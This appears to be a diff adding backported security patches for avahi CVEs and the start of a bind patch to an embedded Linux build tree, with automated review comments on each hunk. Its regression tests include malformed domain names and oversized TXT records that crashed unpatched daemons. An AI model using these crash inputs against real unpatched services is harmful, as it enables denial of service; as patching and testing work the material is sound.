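+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_host_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
+ char *n, *t;
+@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_service_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
+ Client *client;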
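Review bot: Both new `else` branches report AVAHI_ERR_NOT_FOUND ("Hostname not found" and "Service not found") when avahi_alternative_host_name() or avahi_alternative_service_name() returns NULL, yet going by their names those helpers derive a new name rather than look one up, so a NULL presumably means rejected input or a failed allocation. A D-Bus client reading the error would be pointed at the wrong cause. Since this is a backport, I would keep the code as upstream has it and add a comment in each branch, e.g. `/* NULL: name could not be derived (invalid input or out of memory); reported as NOT_FOUND to match upstream */`. msg_server_impl() extends beyond both hunks.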
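--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-core/rr.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/rr.c
++++ avahi-0.7/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+ case AVAHI_DNS_TYPE_TXT: {
+
+ AvahiStringList *strlst;
++ size_t used = 0;
+
+- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+ if (strlst->size > 255 || strlst->size <= 0)
+ return 0;
+
++ used += 1+strlst->size;
++ if (used > AVAHI_DNS_RDATA_MAX)
++ return 0;
++ }
++
+ return 1;
+ }
+ }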
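Review bot: `used += 1+strlst->size;` in avahi_record_is_valid() relies on the reader knowing why each entry costs one extra byte, and nothing in the hunk says so. The companion test in CVE-2023-38469-2.patch compares against avahi_string_list_serialize(), which suggests `used` mirrors the serialized size and the extra byte is the per-string length prefix. A comment above the line would make the bound auditable: `/* serialized form: one length byte plus the string data */`. The running total cannot wrap before the comparison, since each size is already limited to 255 by the check just above it.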
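--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ uint32_t cookie;
+ struct timeval tv;
+ AvahiAddress a;
++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++ AvahiStringList *txt = NULL;
++ int r;
+
+ simple_poll = avahi_simple_poll_new();
+ poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+ printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+
++ memset(rdata, 1, sizeof(rdata));
++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++ assert(r >= 0);
++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++ assert(error == AVAHI_ERR_INVALID_RECORD);
++ avahi_string_list_free(txt);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");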
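Review bot: The new checks in main() are all `assert()` calls, so if client-test is ever compiled with NDEBUG the calls still run but nothing verifies that the oversized TXT list is rejected, and `r` becomes an unused variable. The neighbouring context lines report results with printf rather than asserting, so such a build would not otherwise stand out. An explicit check keeps the regression test meaningful in every build: `if (error != AVAHI_ERR_INVALID_RECORD) { fprintf(stderr, "oversized TXT record was accepted\n"); return 1; }`. main() starts and ends outside the hunks.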
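--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c | 2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain-test.c
++++ avahi-0.7/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+ avahi_free(s);
+
++ printf("%s\n", s = avahi_normalize_name_strdup("."));
++ avahi_free(s);
++
++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++ "}.?.?.?.}.=.?.?.}");
++ assert(s == NULL);
++
+ printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+ printf("%i\n", avahi_domain_equal("A", "a"));
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+ }
+
+ if (!empty) {
+- if (size < 1)
++ if (size < 2)
+ return NULL;
+
+ *(r++) = '.';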
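Review bot: The bound in avahi_normalize_name() changes from `size < 1` to `size < 2` with no comment, and the reason for 2 is only recoverable from the patch subject. Going by that subject, the extra byte guarantees room for at least one label byte after the '.' written on the next line. I would record that at the check: `/* room for the '.' separator plus at least one label byte */`. The function continues outside the hunk, so how `size` is decremented afterwards is not visible here.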
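--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+ #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+ #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+ #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+ #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+ } else
+ empty = 0;
+
+- avahi_escape_label(label, strlen(label), &r, &size);
++ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++ return NULL;
+ }
+
+ return ret_s;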
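Review bot: The `Upstream-Status` line of this patch links to `debian/patches/CVE-2023-38471-2.patch` in the Ubuntu tree, but the file is CVE-2023-38470-2.patch and its `CVE:` tag says CVE-2023-38470. The upstream commit URL on the following line does match the hash on the `From` line, so this looks like a copy-paste slip in the import reference rather than the wrong patch; it still sends anyone verifying provenance to a different file. The path should name the Ubuntu patch this was actually taken from, presumably `debian/patches/CVE-2023-38470-2.patch`.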
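--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+- char *hn = NULL;
++ char label_escaped[AVAHI_LABEL_MAX*4+1];
++ char label[AVAHI_LABEL_MAX];
++ char *hn = NULL, *h;
++ size_t len;
++
+ assert(s);
+
+ AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
+- hn[strcspn(hn, ".")] = 0;
++ h = hn;
++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++ avahi_free(h);
++ return AVAHI_ERR_INVALID_HOST_NAME;
++ }
++
++ avahi_free(h);
+
+- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+- avahi_free(hn);
++ h = label_escaped;
++ len = sizeof(label_escaped);
++ if (!avahi_escape_label(label, strlen(label), &h, &len))
++ return AVAHI_ERR_INVALID_HOST_NAME;
++
++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+- }
+
+ withdraw_host_rrs(s);
+
+ avahi_free(s->host_name);
+- s->host_name = hn;
++ s->host_name = avahi_strdup(label_escaped);
++ if (!s->host_name)
++ return AVAHI_ERR_NO_MEMORY;
+
+ update_fqdn(s);
+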
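Review bot: In avahi_server_set_host_name() the old name is released with `avahi_free(s->host_name)` and the host records are withdrawn before `avahi_strdup(label_escaped)` is known to have succeeded, so an allocation failure returns with `s->host_name` set to NULL and the records already gone. The follow-up CVE-2023-38471-2.patch shows the same order in its context lines. Duplicating first avoids the half-updated state: `new_hn = avahi_strdup(label_escaped);` with its NULL check placed before `withdraw_host_rrs(s);`, then `avahi_free(s->host_name); s->host_name = new_hn;`. The function continues past the end of the second hunk, so whether later code tolerates a NULL host name cannot be seen here.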
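--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
++ if (!hn)
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+ h = hn;
+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+ avahi_free(h);
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ }
+
+ avahi_free(h);
+@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
+ h = label_escaped;
+ len = sizeof(label_escaped);
+ if (!avahi_escape_label(label, strlen(label), &h, &len))
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+
+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
+ avahi_free(s->host_name);
+ s->host_name = avahi_strdup(label_escaped);
+ if (!s->host_name)
+- return AVAHI_ERR_NO_MEMORY;
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+
+ update_fqdn(s);
+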
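Review bot: The out-of-memory return after `s->host_name = avahi_strdup(label_escaped)` in the last hunk now sets the server errno, but by that point the old name has already been freed, so a failed allocation leaves `s->host_name` NULL. Allocating the copy before releasing the old one avoids that state: `char *n = avahi_strdup(label_escaped);` with its NULL check placed ahead of `avahi_free(s->host_name);`, then `s->host_name = n;`. Whether later code tolerates a NULL host name is not visible here, and the body of avahi_server_set_host_name starts and ends outside these hunks.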
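--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ assert(error == AVAHI_ERR_INVALID_RECORD);
+ avahi_string_list_free(txt);
+
++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++ assert(error != AVAHI_OK);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.7/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+ if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+
+- if (avahi_rdata_parse (r, rdata, size) < 0) {
++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+ avahi_record_unref (r);
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+ }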
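Review bot: The regression test added to client-test.c only asserts `error != AVAHI_OK`, while the assertion just above it pins `AVAHI_ERR_INVALID_RECORD`; a loose check passes even if the call fails for an unrelated reason. If the client sees the daemon's code unchanged (not confirmable from the hunk), `assert(error == AVAHI_ERR_INVALID_RDATA);` would tie the test to the guard it is meant to cover. The `!rdata` test in dbus-entry-group.c would also benefit from a one-line comment, for example `/* zero-length rdata presumably arrives as a NULL pointer; reject it before parsing */`. The handler's body starts and ends outside the hunk.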
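--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c | 3 +++
+ avahi-common/alternative.c | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.7/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative-test.c
++++ avahi-0.7/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ const char* const test_strings[] = {
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++ ").",
++ "\\.",
++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+ "gurke",
+ "-",
+ " #",
+Index: avahi-0.7/avahi-common/alternative.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative.c
++++ avahi-0.7/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+
+ char *avahi_alternative_host_name(const char *s) {
++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++ char *alt, *r, *ret;
+ const char *e;
+- char *r;
++ size_t len;
+
+ assert(s);
+
+ if (!avahi_is_valid_host_name(s))
+ return NULL;
+
+- if ((e = strrchr(s, '-'))) {
++ if (!avahi_unescape_label(&s, label, sizeof(label)))
++ return NULL;
++
++ if ((e = strrchr(label, '-'))) {
+ const char *p;
+
+ e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+
+ if (e) {
+ char *c, *m;
+- size_t l;
+ int n;
+
+ n = atoi(e)+1;
+ if (!(m = avahi_strdup_printf("%i", n)))
+ return NULL;
+
+- l = e-s-1;
++ len = e-label-1;
+
+- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+
+- if (!(c = avahi_strndup(s, l))) {
++ if (!(c = avahi_strndup(label, len))) {
+ avahi_free(m);
+ return NULL;
+ }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+ } else {
+ char *c;
+
+- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+ return NULL;
+
+ drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+ avahi_free(c);
+ }
+
++ alt = alternative;
++ len = sizeof(alternative);
++ ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++ avahi_free(r);
++ r = avahi_strdup(ret);
++
+ assert(avahi_is_valid_host_name(r));
+
+ return r;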
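Review bot: The block added at the end of avahi_alternative_host_name uses three results without checking them: `strlen(r)` dereferences r, `avahi_escape_label()` can return NULL (the server.c fix for CVE-2023-38471 tests for exactly that), and `avahi_strdup(ret)` can fail, after which `assert(avahi_is_valid_host_name(r))` runs on a NULL pointer. Where r is assigned lies outside the hunk, so whether it can already be NULL on entry to this block is inferred from the allocating calls around it. I would write `if (!(ret = avahi_escape_label(r, strlen(r), &alt, &len))) { avahi_free(r); return NULL; }`, then `avahi_free(r);` and `if (!(r = avahi_strdup(ret))) return NULL;`, so an allocation or escaping failure becomes a NULL return rather than a daemon abort.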
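--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
+From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
+Date: Thu, 8 Sep 2022 11:11:30 +0200
+Subject: [PATCH 1/3] Bound the amount of work performed for delegations
+
+Limit the amount of database lookups that can be triggered in
+fctx_getaddresses() (i.e. when determining the name server addresses to
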